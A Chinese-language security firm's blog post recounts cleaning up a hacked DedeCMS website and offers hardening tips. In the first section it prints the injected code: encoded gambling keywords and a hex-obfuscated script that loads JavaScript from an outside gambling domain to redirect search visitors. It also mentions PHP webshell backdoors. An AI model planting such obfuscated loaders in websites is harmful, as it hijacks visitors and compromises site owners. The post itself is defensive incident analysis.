eSafe白帽駭客資安網-網絡安全背後的巨人,提供駭客,網站入侵測試,網站被駭,網站漏洞,駭客入侵,資訊安全,入侵,ecshop,wordpress,漏洞修復,木馬清除,資安服務

網站被駭 該如何更好的處理?



          2018.6.19當天接到一位新客戶反映自己的網站被駭了,網站首頁也被駭客篡改了,網站首

頁被加了一些與網站不相符的內容與加密的代碼,導致百度網址安全中心提醒您:該頁面可能存

在木馬病毒!網站在百度的收錄與快照也被劫持成什麼世界盃投注,以及博彩,賭博等等的內容,

根據以上客戶給我們反映的網站被駭的問題,我們eSafe白帽資安網公司立即安排安全技術人員對客戶網

站被黑的情況進行了詳細的網站安全檢測與代碼的人工安全審計,發現客戶網站首頁之前是經常的

被篡改,客戶只能刪除掉首頁文件,然後重新生成首頁,實在是反覆被篡改的沒辦法了,才找到我

們eSafe白帽資安網公司來處理網站的安全問題.




一.網站被駭的狀況分析
 
1.客戶的網站採用的是,織夢DEDECMS系統(PHP+MYSQL數據庫架構),dedecms漏洞在近幾

年實在是爆出了太多,但是現在用dedecms做網站以及平台的也很多,一般企業站或做優化排名的網

站都是用這個織夢的程序來做,優化快,訪問速度也快,全站可以靜態文件生成,方便管理更新文章,

也方便網站打開的速度,以及關鍵詞方面的優化與提升。通過與客戶的溝通瞭解,發現客戶的網站

,只要是發佈新的文章,並在後台生成新的html頁面,或者生成首頁index.html,就會被攻擊者直

接增加了一些加密的代碼與賭博的內容,圖片如下:



網站被篡改的內容都是加了一些什麼,極速賽車,賭博,博彩、賭球,世界盃投注的與網站不相關

的內容,而且這個網站代碼還做了JS判斷跳轉,針對於Baidu搜索來的客戶,會直接跳轉到這個極速

賽車、賭博、博彩的頁面,導致360提示博彩網站攔截,百度提示風險攔截的圖片如下:



網站在百度的搜索中會直接風險提示:百度網址安全中心提醒你:該頁面可能存在木馬病毒。


通過對客戶網站的所有代碼的安全檢測與代碼的人工安全審計,發現網站首頁index.html中的內容

被篡改,並發現在dedecms模板目錄文件下的index.htm文件也被篡改了。



我們來打開index.htm模板文件,看下代碼:
 
<meta content="text/html; charset=gb2312" http-equiv="Content-Type"/>
 
  <title>
   &#26497;&#36895;&#36187;&#36710;&#35745;&#21010;&#36719;&#20214;&#97;
&#112;&#112;&#19979;&#36733;&#95;&#26497;&#36895;&#36187;&#36710;&#243
20;&#22870;&#30452;&#25773;&#95;&#26497;&#36895;&#36187;&#36710;&#2788
0;&#20876;&#30331;&#24405;&#45;&#26497;&#36895;&#36187;&#36710;&#23448;
&#32593;&#24179;&#21488;&#12290;
  </title>
  <meta content="&#26497;&#36895;&#36187;&#36710;&#44;&#26497;&#36895;&#
36187;&#36710;&#36208;&#21183;&#20998;&#26512;&#44;&#26497;&#36895;&#3
6187;&#36710;&#24320;&#22870;&#32467;&#26524;&#44;&#26497;&#36895;&#36
187;&#36710;&#20154;&#24037;&#35745;&#21010;&#12290;" name="keywords"/>

 
下面的這一段代碼是加密的JS跳轉代碼,是根據百度搜索等相應的條件,進行判斷,然後跳轉,直

接輸入網站域名不會跳轉。

 
  <script type="text/javascript">
   window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]
('\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6
a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3d\x22\x68\x74\x74\
x70\x3a\x2f\x2f\x77\x77\x77\x2e\x38\x30\x30\x30\x6b\x61\x69\x2e\x63\x6f\x6d\x2f\x
73\x74\x61\x74\x69\x63\x2f\x6a\x73\x2f\x38\x30\x30\x30\x6b\x61\x69\x2e\x6a\x73\x
22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
  </script>

上面查到一些加密的代碼,用編碼的解密查到,是一些博彩與賭球相關的內容,我們把生成首頁後

被篡改的內容直接刪除掉,然後對其網站裡留存下來的木馬病毒,以及木馬後門進行清除,並做好

網站的漏洞檢測與漏洞修復,部署網站防篡改方案。



二.網站被駭的清理過程記錄
 
1.網站經過eSafe白帽資安網技術的安全審計後,在安全的處理過程中發現網站根目錄下的datas.php文件內

容屬於assert類型的一句話木馬。



那麼既然發現有一句話木馬,那肯定是存在PHP腳本木馬的,隨即發現在css目錄下有個文件是

base64加密的代碼,我們訪問該木馬地址,進行了訪問發現的確是木馬病毒的,所在圖片如下:



該PHP腳本木馬的操作權限實在是太大了,對文件的編輯以及改名,以及執行惡意的sql語句,查

看主機的系統信息都可以看的很清楚.對網站的所有程序代碼,進行了木馬特徵掃瞄,發現了

N個網站木馬文件,怪不得客戶自己說反反覆覆的出現被黑,網站被篡改的都快要吐血了。掃瞄到

的木馬病毒如下圖所示:



這麼多個腳本木馬後門,我們安全技術直接進行了全部刪除清理,由於客戶網站用的是單獨的服務

器。那麼對主機的安全也要進行詳細的安全加固和網站安全防護,查看到網站的mysql數據庫,

分配給網站使用的是root權限,(用root管理員權限會導致整個主機都會被黑,增加了攻擊風險

)我們給客戶主機增加了一個普通權限的數據庫賬戶分配給網站,數據庫的端口3306以及135

端口445端口139端口都進行了端口安全策略部署,杜絕外網一切連接,只允許內網連接,對服務

器進行了詳細的主機安全設置和部署,後續我們對網站的所有文件,代碼,圖片,數據庫裡的

內容,進行了詳細的安全檢測與對比,從SQL注入測試、XSS跨站安全測試、表單繞過、文件上

傳漏洞測試、文件包含漏洞檢測、網頁掛馬、網頁後門木馬檢測、包括一句話小馬、aspx大馬、

腳本木馬後門、敏感信息洩露測試、任意文件讀取、目錄遍歷、弱口令安全檢測等方面進行了全

面的安全檢測,與漏洞修復,至此客戶網站被駭的問題才得以完美的解決。因為之前客戶都是平

均一天被篡改兩三次,從做安全部署到今天20號,客戶網站訪問一切正常,沒有被篡改。
 
三.針對於網站被駭的防護建議
 
1.定期的更新主機系統漏洞(windows 2008 2012、linux centos系統),網站系統升級,盡量

不適用第三方的API插件代碼。

 
2.如果自己對程序代碼不是太瞭解的話,建議找網站安全公司去修復網站的漏洞,以及代碼的安

全檢測與木馬後門清除,國內推薦eSafe白帽資安網公司、綠盟安全公司、啟明星辰等的網站安全公司,

做深入的網站安全服務,來保障網站的安全穩定運行,防止網站被木馬之類的安全問題。

 
3.盡量不要把網站的後台用戶的密碼設置的太簡單化,要符合10到18位的大小寫字母+數字+符號

組合。

 
4.網站後台管理的路徑一定不能用默認的admin或guanli或manage 或文件名為admin.asp的路徑

去訪問。

 
5.主機的基礎安全設置必須要詳細的做好,端口的安全策略,註冊表安全,底層系統的安全加固

,否則主機不安全,網站再安全也沒用。

分享: